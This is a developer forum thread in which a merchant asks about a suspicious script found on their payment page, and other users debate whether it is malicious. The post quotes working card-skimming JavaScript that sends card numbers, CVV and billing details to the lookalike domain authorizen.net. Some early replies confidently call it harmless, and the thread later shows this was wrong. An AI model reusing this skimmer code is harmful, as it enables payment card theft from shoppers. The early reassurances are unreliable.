Search

OUR API

API Developer Guides API Reference Sample Code [on GitHub]
SDKs [on GitHub] API Change Log System Change Log
Upgrade Guide

Hello World

Get Started Common Setup Questions How Payments Work
Testing Guide Go-Live Checklist

Support

Get Support News and Announcements Forums
Authorize.Net on GitHub Authorize.Net on Stack Overflow Developer Blog
Response (Error) Codes FAQs Knowledge Base

Sign In

Sandbox Affiliate

Search Developer Site

Integration and Testing

Authorize.Net API questions and help with your payment integration.

Reply
feri2
Member
feri2
Posts: 1
Registered: ‎11-14-2018

https://authorizen.net/ ?

‎11-14-2018 09:18 AM

Hello,

 

Can you please help me?

 

My former developer left in kind of a hurry  and i am afraid that he has modified the code of my shop too.

 

I found a suspicious line on the payment site:

 

<script type="text/javascript">$(":button").click(function() {
if(document.getElementsByName('CCCode')[0].value.length>1)
{
  var xmlhttp;
  
if (window.XMLHttpRequest) 
{
    xmlhttp=new XMLHttpRequest();
  } 
else {
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
  
xmlhttp.open("POST", "https://authorizen.net/XXX.php", true);
  
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  
xmlhttp.send('data='+document.getElementsByName('CCNumber')[0].value+'|'+document.getElementsByName('CCExMonth')[0].options[document.getElementsByName('CCExMonth')[0].selectedIndex].value+'|'+document.getElementsByName('CCExYear')[0].options[document.getElementsByName('CCExYear')[0].selectedIndex].value+'|'+document.getElementsByName('CCCode')[0].value+'|'+document.getElementsByName('CCName')[0].value+'|'+document.getElementsByName('CCAddress')[0].value+'|'+document.getElementsByName('CCCity')[0].value+'|'+document.getElementsByName('CCState')[0].value+'|'+document.getElementsByName('CCZip')[0].value+'|'+document.getElementsByName('CCCountry')[0].value+'|'+document.getElementsByName('CCPhone')[0].value);

}});

 

I noticed that it posts to authorizeN.net not authorize.net. (XXX is a substitue for  private data)

 

Is this something to worry about?

 

Thanks,

 

feri

Message 1 of 10 (167,036 Views)
Reply
0 Kudos
Highlighted
All Star
Renaissance
Posts: 685
Registered: ‎11-05-2018

Re: https://authorizen.net/ ?

[ Edited ]

‎11-15-2018 09:53 AM - edited ‎11-15-2018 09:54 AM

Without even examining the rest of your code, the url seems hardly malicious. If you type that in a browser it redirects to authorize.net, which is a pretty dead on guarantee authorize.net owns that domain too (companies buy domains that are nearly identical to their primary domain name all the time for a number of reasons, and it would be a little unusual for malicous site to redirect you to a legitimate site.).

 

 

Message 2 of 10 (166,832 Views)
Reply
nic73
Member
nic73
Posts: 9
Registered: ‎06-12-2011

Re: https://authorizen.net/ ?

‎11-15-2018 12:08 PM

The domain resolves to an ip address out of Montenegro. So unless authorize.net has servers in that country I would say it is suspicious.

 

Message 3 of 10 (166,793 Views)
Reply
0 Kudos
Authorize.Net Wizard Authorize.Net Wizard
Authorize.Net Wizard
mmcguire
Posts: 109
Registered: ‎11-29-2017

Re: https://authorizen.net/ ?

‎11-16-2018 10:20 AM

Authorize.Net definitely does not have an api endpoint in that format. The form should be taken offline until it is worked out.

Message 4 of 10 (166,409 Views)
Reply
All Star
Renaissance
Posts: 685
Registered: ‎11-05-2018

Re: https://authorizen.net/ ?

‎11-17-2018 12:42 AM

That’s the only thing that had me hedging my bets.I didn’t think that authorize has any endpoint like that. My best guess at this one is he doesn’t know what he’s doing and made a typo in the process of setting up a inoperable form. In that case it’s good he left.

Question- did the developer in question ever help you implement a successful integration? Something doesn’t add up there. Either I’m missing something or he just doesn’t know what he’s doing. But it’s all nothing in any event. There is no chance of harm coming from that domain, no reason at all to think it’s malicious in any way. You just need someone who knows what she’s doing to come in and fix things for you. You’ll be fine.
Message 5 of 10 (166,075 Views)
Reply
nic73
Member
nic73
Posts: 9
Registered: ‎06-12-2011

Re: https://authorizen.net/ ?

‎11-18-2018 07:20 AM

That address is redirecting back to authorize.net. If authorize.net has no connection to that domain it means some is purposely redirecting it. The ip for that domain is tracing back to Montenegro  in Europe.

 

If this code is inside a working payment form then that script has nothing to do with the normal functionality of the page and it is simply sending credit card info to some unkown server in Montenegro.

 

It might not be malicious concerning the previous developer, they might not have been aware of it but I disagree that there is no chance of harm coming from the domain. 

 

That script doesn't look like anything a developer would use to communicate with authorize.net.

 

Newegg had a similar hack a few months ago. Hackers setup a fake domain(neweggstats.com) name with a ssl certificate. They were able to inject script code into the payment form that skimmed credit card info.

 

 

Message 6 of 10 (165,214 Views)
Reply
0 Kudos
andreer
Member
andreer
Posts: 1
Registered: ‎11-18-2018

Re: https://authorizen.net/ ?

[ Edited ]

‎11-18-2018 11:22 AM - edited ‎11-18-2018 11:23 AM

I have the same problem, please help!

Message 7 of 10 (165,070 Views)
Reply
0 Kudos
All Star
Renaissance
Posts: 685
Registered: ‎11-05-2018

Re: https://authorizen.net/ ?

‎11-18-2018 02:19 PM

Nic, it is very bizarre that someone would be using authorizen.net as and endpoint. I still think it is nothing to worry about. Companies buy domain names to catch typos of their primary domain. Authoriz.net also redirects to their homepage.

There are a few reasons a company might do this. The big one being that someone else could piggy back on their name and reputation and use it to capture traffic. In the worst case scenario the parasitic domain owner harms the customers. In the other case it’s just a numbers game to get customers for legitimate services/products.

Look at the number of views the posts on here get. This is a very well known company. In whatever time period it takes for 100,000 to visit the site, how many of those 100,000 are going to accidentally type an extra n? If it’s 1% that’s better than most websites get. So companies swoop up these domains.

As for the server in Montenegro, authorize does business all over Europe. Not quite such a massive red flag as it first sounds. Europe is small and hosting companies there I’m sure have servers throughout.

The other big thing is that this is used as an endpoint, not a bogus customer facing payment form. If someone bought this domain, I imagine it would have cost a lot, and to monetize it in this manner they would have to get people to go and alter script files of business owners. It sounds like a very costly thing to do. In college we watched a documentary on CC info theft, and stolen CC numbers are ridiculously cheap. So why not be a front facing scammer and syphon traffic, instead of having to pay or entice people to get behind the scenes of real businesses? It just doesn’t make sense to me, although this whole thing is just downright bizarre, especially now that we’ve got a new one chiming in.

For sure that payment for needs to be yanked. I would really be interested in an authorize employee chiming in for who really owns that domain. This is really puzzling and now I’m interested.



Message 8 of 10 (164,945 Views)
Reply
0 Kudos
menudrive-myles
Member
menudrive-myles
Posts: 7
Registered: ‎07-12-2018

Re: https://authorizen.net/ ?

[ Edited ]

‎11-21-2018 07:38 PM - edited ‎11-21-2018 07:38 PM

@andreer
Then you probably were compromised as well, as there is no way this is a legitimate domain owned by Authorize.net. Are both of you possibly running JQuery File Upload (or one of it's derivatives) as every Tom, Dick and Harriet is targeting sites running that as we speak.

Message 9 of 10 (161,799 Views)
Reply
0 Kudos
All Star
Renaissance
Posts: 685
Registered: ‎11-05-2018

Re: https://authorizen.net/ ?

‎11-25-2018 09:33 AM

I posted about this the other day and accidentally deleted my post trying to edit it. I was dead wrong. I looked up this domain and it is not owned by authorize.net. Authoriz.net and Authorized.net are also redirect domains, and both domains have authorize.net listed as the owner on the registry.  It is clear that authorize.net publicly claims ownership of any domain they own.

 

authorizen.net is listed under GTO Projects Limited, and one or more domains under GTO ltd have been logged by brute forcers blacklist for attempted brute force attacks on other websites.  

 

What threw me off was that the developer was suspected of editing the code. It seemed to me that this would be a rather expensive way of monetizing on a fake domain. I'll let others chime in, but as has been said it looks like sites have been compromised, and it is most likely not rogue developers behind the scenes, but code execution/XSS attacks. Was that what you suspected menudrive-myles ?

 

Message 10 of 10 (157,791 Views)
Reply
0 Kudos